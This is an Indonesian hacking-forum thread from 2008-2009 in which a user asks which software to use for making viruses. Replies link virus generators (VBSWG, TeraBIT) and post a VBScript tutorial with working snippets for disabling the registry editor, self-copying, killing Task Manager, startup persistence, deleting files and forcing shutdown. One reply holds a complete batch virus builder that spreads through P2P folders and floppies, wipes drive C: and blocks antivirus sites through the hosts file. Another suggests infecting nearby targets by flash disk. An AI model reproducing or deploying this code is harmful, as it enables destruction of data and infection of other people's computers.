Username Password

Lost Password
View Thread
Explore Your Brain » Pemrograman » Out Of Topic Programing
Kalo bikin virus make software apa?
Username
Password
Register FAQ Members List Today's Posts Search

Print Thread

27-09-2008 08:17 AM Kalo bikin virus make software apa?
User Avatar

KaptenZoro
Murid Akademi II


Posts: 30
Joined: 27.09.08
Location: tangerang
Age: 28
tolong cepat d jawab
Kalo bikin virus make software apa?
selalu berusaha
 
Offline
27-09-2008 08:39 AM RE: Kalo bikin virus make software apa?
User Avatar

suckeve
Anbu


Posts: 495
Joined: 30.08.08
Location: nowhere
Age: 31
klo yg sering gw denger bikin virus pake VB
tapi gw blom taw caranyaGrinGrin

untuk worm gampang,,ada sofwarenya

namanya VBSWG

VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut


Situs yg menyediakan VBSWG :

http://www.virii.com.ar
http://www.kvirii.com.ar
http://vx.netlux.org/dat/tv07.shtml

Atau tanya ke paman google dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnyaGrinGrin
 
Offline
27-09-2008 09:08 AM RE: Kalo bikin virus make software apa?
User Avatar

suckeve
Anbu


Posts: 495
Joined: 30.08.08
Location: nowhere
Age: 31
TAMBAHAN

:TeraBIT:

[url]
http://mupenx.890m.com/Software/TVM2.8SE.zip[/url]

photos.gilaupload.com/images/981_Terabitvm2.8se.gif

Virus yang dihasilkan oleh software pembuat virus yang diproduksi di iran ini lumayan kumplit kemampuannya. Jenis virus yang dihasilkan adalah jenis trojan. TeraBIT virus maker sudah keluar dalam beberapa versi, bahasa maupun kemampuan, untuk data terakhir telah keluar versi 2.8 SE yang dibuat pada bulan september 2007.

Seperti dalam daftar kemampuan virus yang diciptakan diatas, memang lumayan kumplit. Nah sekarang tinggal kita amati apa masalah komputer yg terserang virus seperti di atas, maka kemungkinan besar anda terserang virus hasil dari program tersebut.

Untuk versi ini yang perlu diperhatikan adalah:

menambah files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
data lama: Explorer.exe
data baru: explorer.exe C:\WINDOWS\system32\csmm.exe

Oleh sebuah antivirus terdeteksi dengan nama virus: Backdoor.Win32.VB.bna


Langsung Download Adja Yach


LUPA KUNJUNGIN NICH KALO ANDA MAU BELAJAR TENTANG BGINIAN

http://neukcrims.aforumfree.com/virus...tools-f17/

lumayan lengkap tutorialnya
 
Offline
30-09-2008 09:34 AM RE: Kalo bikin virus make software apa?
User Avatar

sanca
Chunnin


Posts: 81
Joined: 09.07.08
Location: karawang tea
Age: 34
Software2 diatas memang cocok buat belajar. namun saya belum tau, maksud om pngen buat virus ini buat apa...? masalahnya, virus2 yang kita buat menggunakan software2 diatas itu biasanya suka ke detect sama antiviru2 yang biasa sekalipun,,,(berdasarkan pengalaman)

Usul saya, mending om bikin aja di notepad,,,,banyak ko tutor virus notepad,,( gak bakal ke dtect klo kita bikin pake code yang sederhana banget).

Buat tips and trik nya nyusul aja ya...??? ( ingat, tips trik yang sederhana saja ya..??) soalnya saya masih newbie, jadi jangan tanya macem2...GrinGrin
+=+=+=+=SAnca=+=+=+=+

[size=150][/size]
 
Offline
03-10-2008 08:33 AM RE: Kalo bikin virus make software apa?
User Avatar

EVA-00
HackAge


Posts: 2769
Joined: 21.05.08
Location: Wallahu a'lam
Age: 35
Cara yg di berikan oleh suckeve emang bagus bagi orang2 yang males buat virus biasanya mereka di bilang Script Kiddie tapi kl lu mau bener2 tau dasar cara buatnya coba baca buku ini, referensi bagus untuk lu belajar

i332.photobucket.com/albums/m325/exploreyourbrain/eva00/200602.gif

i332.photobucket.com/albums/m325/exploreyourbrain/eva00/200604.gif

i332.photobucket.com/albums/m325/exploreyourbrain/eva00/200603.gif


Picture taken from [url=www.jasakom.com]Jasakom[/url]
Nabi Muhammad SAW bersabda :” Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahui” (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
Offline
04-10-2008 09:02 PM RE: Kalo bikin virus make software apa? | Edited by EVA-00 05-10-2008 05:00 AM
User Avatar

Aish
Jounin Spesial


Posts: 243
Joined: 30.09.08
Location: Jakarta yg sumpek
Age: 35
cara bikin virus
Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"

lalu mengubah registry yang lain.

2. mengopikan diri ke direktory lain

CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfile wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary


3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide


4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)


5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\ )

6.Merestart Windows
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 sekon

7.Meng-ShutDown Windows
CreateObject("WScript.Shell").run "shutdown -s-f -t 60", vbhide
mematikan windows dalam waktu 60 sekon :)yang beda cuman
"shutdown -s-f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
'(masukkan kode virus disini)
End if
'misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
'dan tahun 2007

Ok. Pelajaran bikin virus untuk hari ini saya kira udah cukup.
walaupun udah sering dibahas,, nggak papalah,,,, itung-itung
buat nambahin pengetahuan kita. dan semoga bermanfaat:D
 
Offline
04-10-2008 11:55 PM RE: Kalo bikin virus make software apa?
User Avatar

si_tunge
Anbu


Posts: 376
Joined: 09.09.08
Location: Di dalam kancutnya sandra dewi
Age: 31
Trus gmNa cranya biar virus yg qta buat,gak nyrang qta sendiri?apakah msti make antivirus bwt mNangkaLnya?kLo gtU sia2 doNk virus yg qta bwt?woNg bru bkin Lngsung kdteksi.
INDONESIA GW ANCUR GARA2 PEMIMPINNYA CACAD
 
Offline
05-10-2008 02:49 AM RE: Kalo bikin virus make software apa?
User Avatar

EVA-00
HackAge


Posts: 2769
Joined: 21.05.08
Location: Wallahu a'lam
Age: 35
@si_tunge -> gunakan applikasi Deepfrezze or Virtual machine jadi ketika kita membuat virus, virus tersebut tidak akan menginfeksi komputer kita, jika menggunakan deepfrezze tentu virus yg anda buat akan langsung K.O saat komputer ke Restart, atau jika anda menggunakan Virtual Machine komputer anda juta tidak akan terinfeksi karna yang terinfeksi hanya komputer virtual, kecuali jika anda tidak bisa mengoprasikan kedua applikasi tersebut kemungkinan malah senjata makan tuan deh Grin
Nabi Muhammad SAW bersabda :” Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahui” (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
Offline
05-10-2008 04:46 AM RE: Kalo bikin virus make software apa?
User Avatar

Aish
Jounin Spesial


Posts: 243
Joined: 30.09.08
Location: Jakarta yg sumpek
Age: 35
Btul bgt kata om eva Pfft gampangan pake dreepfreeze ko ga usah kwatir,nah ente bikinnya simpen di flashdisk selanjutnya virus anda siap dpasarkan ke target terdekat tanpa harus kwatir senjata makan tuan wkwkwk
 
Offline
28-10-2008 02:45 AM RE: Kalo bikin virus make software apa?
User Avatar

Bledek_82
Murid Akademi II


Posts: 22
Joined: 28.10.08
Location: Blitar
Age: 38
kayaknya ada program undep freeze cuman lupa ane alamatnya Pfft ..... next time yah Wink
semua PERISTIWA pasti ada HIKMAHnya
 
Offline
28-10-2008 08:08 PM RE: Kalo bikin virus make software apa?
User Avatar

si_tunge
Anbu


Posts: 376
Joined: 09.09.08
Location: Di dalam kancutnya sandra dewi
Age: 31
om! ada link yg baru lagi gak???
link buat donlot generator virusnya udah pada gak bisa tuh...

INDONESIA GW ANCUR GARA2 PEMIMPINNYA CACAD
 
Offline
28-10-2008 11:40 PM RE: Kalo bikin virus make software apa?
User Avatar

bleedingfirsttime
Murid Akademi I


Posts: 4
Joined: 18.10.08
Location: ciganjur jagakarsa
Smile
 
Offline
12-12-2008 01:31 AM RE: Kalo bikin virus make software apa?
User Avatar

Cruz3N
Murid Akademi II


Posts: 33
Joined: 04.12.08
Age: 32
Download source  Code
:startage
echo off
echo ..................
echo : Virus Gen 2.o :
echo : By: Vinylshakers :
echo :................:
echo
echo · Startup
echo · Copy To Windows
echo · Delete HARDRIVE
echo enter name of virus Below
set /p filename=%filename%
cls
Echo Add To Startup? Yes or No Note:Use all LowerCase
set /p answer=%answer%
IF "%answer%"=="yes" goto start
goto copy
IF not "%answer%"=="yes" goto copy
goto copy
:copy
Echo Copy TO %WINDIR% A:\ P2P FOLDER? YES OR NO
set /p answer2=%answer2%
IF "%answer2%"=="yes" GOTO START2
:DEL
echo Delete Windows?
set /p answer3=%answer3%
IF "%answer3%"=="yes" GOTO START3

echo Share c:\
set /p answer4=%answer4%
IF "%answer4%"=="yes" GOTO START4

:lmhost
echo Stop From Going To Anti-Virus Websites?
set /p answer5=%answer5%
IF "%answer5%"=="yes" GOTO ass
IF "%answer5%"=="no" exit

:start
echo COPY "c:\%filename%.BAT" "C:\Documents and Settings\All Users\Start Menu\Programs\startup\%filename%.bat">>c:\%filename%.bat
goto copy
:start
:START2
echo COPY "c:\%filename%.bat" "c:\My Shared Folder">>c:\%filename%.bat
echo COPY "c:\%filename%.bat" "c:\program files\Morpheus\My Shared Folder">>c:\%filename%.bat
echo COPY "c:\%filename%.bat" "c:\program files\Grokster\My Grokster">>c:\%filename%.bat
echo COPY "c:\%filename%.bat" "c:\program files\eMule\Incoming">>c:\%filename%.bat
echo COPY "c:\%filename%.bat" "c:\program files\limewire\Shared">>c:\%filename%.bat
echo copy c:\windows\%filename%.BAT>>c:\%filename%.bat
ECHO COPY C:\%filename%.BAT A:\COMPRESS.BAT>>C:\%filename%.BAT
GOTO DEL
:start2

:start3
echo deltree /y c:\>>c:\%FILENAME%.BAT
echo del c:\ /y /s>>c:\%FILENAME%.BAT
:start3
:start 4
echo net share c:\=haxor>>c:\%filename%.bat
goto lmhost
:start 4
:ass
echo cmd /c "echo 127.0.0.1 www.symantec.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.sophos.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.avast.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.mcafee.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.f-prot.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.f-secure.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.avp.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.kaspersky.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.trendmicro.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.bitdefender.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.my-etrust.com>>c:\windows\system32\Drivers\Etc\Hosts>>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.eset.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.norman.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.grisoft.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.google.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 www.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 mx1.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 mx2.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
echo cmd /c "echo 127.0.0.1 messenger.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts">>c:\%filename%.bat
exit
:ass
pause




Sumpah ane cuman ngopi doang kagak bisa buat yang beginian...

CMIIW
 
Offline
25-01-2009 12:06 AM RE: Kalo bikin virus make software apa?
User Avatar

gandasibarani
Murid Akademi I


Posts: 3
Joined: 22.01.09
Location: semarang
Age: 32
Kapten..program untuk buat virus itu..ad banyak...mulai dari virus yg sderhana ampe advance gitu...tp saya saranin untuk beginner pake notepad ato VB ajaThanks
thanks a lot
 
Offline
28-01-2009 01:35 AM RE: Kalo bikin virus make software apa?
User Avatar

didon
Murid Akademi I


Posts: 17
Joined: 04.01.09
Location: palembang
Age: 34
klo darurat gak ada compiler nya enak pake notepad aja bos
contoh aje
start
start
start
nama file

simpen dengan bat tinggal di tarok di tempat yang sakral Geekjd waktu pertama buka jalan tuh prog kitek.Sorry.xixixix
ni cuma pengetahuan aje jangan sering ngisengin orang yek...Grin
orang yang aneh...
 
Offline
Jump to Forum:
Forum powered by fusionBoard
Share this Thread
URL:
BBcode:
HTML:
Similar Threads
Thread Forum Replies Last Post
(ask) mohon Bantuan kepada teman2 untuk Crack Software CCBoot V3.0 Software 2 23-10-2013 08:17
[-help] bikin cms PHP 6 20-08-2013 16:10
Anti Virus Windows 2 16-06-2013 22:12
Breathe Carolina-Hell Is What You Make It: Reloaded (2012) MP3 Album 3 26-07-2012 18:53
Breathe Carolina-Hell Is What You Make It (2011) MP3 Album 4 21-08-2011 14:52
Copyright © 2007-2016